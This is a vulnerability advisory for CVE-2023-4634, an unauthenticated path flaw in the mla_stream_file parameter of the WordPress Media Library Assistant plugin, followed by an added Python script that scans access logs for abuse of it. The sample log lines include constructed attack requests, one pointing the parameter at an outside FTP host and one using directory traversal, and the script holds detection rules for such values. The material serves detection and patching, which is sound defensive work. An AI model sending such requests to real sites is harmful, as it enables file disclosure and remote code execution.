PT-2023-4919 · WordPress · Media Library Assistant

Montel


Published 2023-08-30 · Updated 2025-09-29 · CVE-2023-4634
CVSS v2.0: 10 (Critical)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Vulnerable software and affected versions: Media Library Assistant plugin for WordPress, versions up to and including 3.09
Description: The plugin applies insufficient controls to the file path supplied in the mla_stream_file parameter of the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP, enabling directory listing, local file inclusion, and remote code execution. The estimated number of potentially affected devices worldwide is around 70,000 WordPress sites.
Recommendations: For Media Library Assistant plugin for WordPress versions up to and including 3.09, update to version 3.10 or newer as soon as possible to resolve the issue. As a temporary workaround, restrict access to the mla_stream_file parameter and the ~/includes/mla-stream-image.php file to reduce the risk of exploitation. Additionally, avoid using the mla_stream_file parameter in the affected endpoint until the issue is resolved.
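While the workaround above is applied, a site operator will want to know whether the stream endpoint has already been probed. The script below is an added example, not part of this advisory or of the plugin's own code: it parses access-log lines in the common "combined" format, keeps only requests whose path ends in mla-stream-image.php, and flags any mla_stream_file value that is not a plain relative path (a URL scheme such as ftp://, a ".." traversal segment, an absolute path, or an embedded null byte). The log lines are constructed for the example, and the plugin directory name in them (media-library-assistant) is an assumption; the matcher keys on the file name only, so it works regardless of where the plugin is installed.

```python
"""Triage access logs for abusive mla_stream_file values (added example, not advisory code)."""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines in Apache/nginx "combined" format. The plugin
# directory name is assumed; only the file name mla-stream-image.php matters.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Aug/2023:10:01:02 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=2023/08/photo.jpg HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [30/Aug/2023:10:01:09 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp%3A%2F%2F198.51.100.9%2Fx.png HTTP/1.1" 200 77 "-" "curl/8.0"
203.0.113.8 - - [30/Aug/2023:10:02:44 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=..%2F..%2F..%2Fsecret.txt HTTP/1.1" 500 0 "-" "python-requests/2.31"
203.0.113.9 - - [30/Aug/2023:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# ip, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

ENDPOINT = "mla-stream-image.php"   # file named in the advisory
PARAM = "mla_stream_file"           # parameter named in the advisory


def classify_value(value: str) -> Optional[str]:
    """Return a reason if the parameter value does not look like a relative
    upload path, else None. A second unquote catches double-encoded values."""
    v = unquote(value)
    if "\x00" in v:
        return "null-byte"
    if "://" in v:
        return "url-scheme"        # e.g. the FTP case described in the advisory
    normalized = v.replace("\\", "/")
    if ".." in normalized.split("/"):
        return "traversal"
    if normalized.startswith("/"):
        return "absolute-path"
    return None


def triage(log_text: str) -> list:
    """Return one dict per suspicious request to the stream endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                # not a combined-format line; skip
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/" + ENDPOINT):
            continue                # some other resource
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get(PARAM, []):
            reason = classify_value(value)
            if reason:
                hits.append({
                    "ip": m["ip"], "ts": m["ts"], "status": m["status"],
                    "value": unquote(value), "reason": reason,
                })
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["reason"]:13s} {hit["value"]} (HTTP {hit["status"]})')
```

Run against the sample, the script reports the ftp:// request and the traversal attempt and stays silent on the legitimate relative path and the unrelated index.php request. A 200 status on a flagged line is the case worth escalating, since it means the endpoint served the request rather than rejecting it.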

Tags: Exploit · Fix · RCE


Weakness Enumeration

Related identifiers

BDU:2023-05428
CVE-2023-4634

Affected products

Media Library Assistant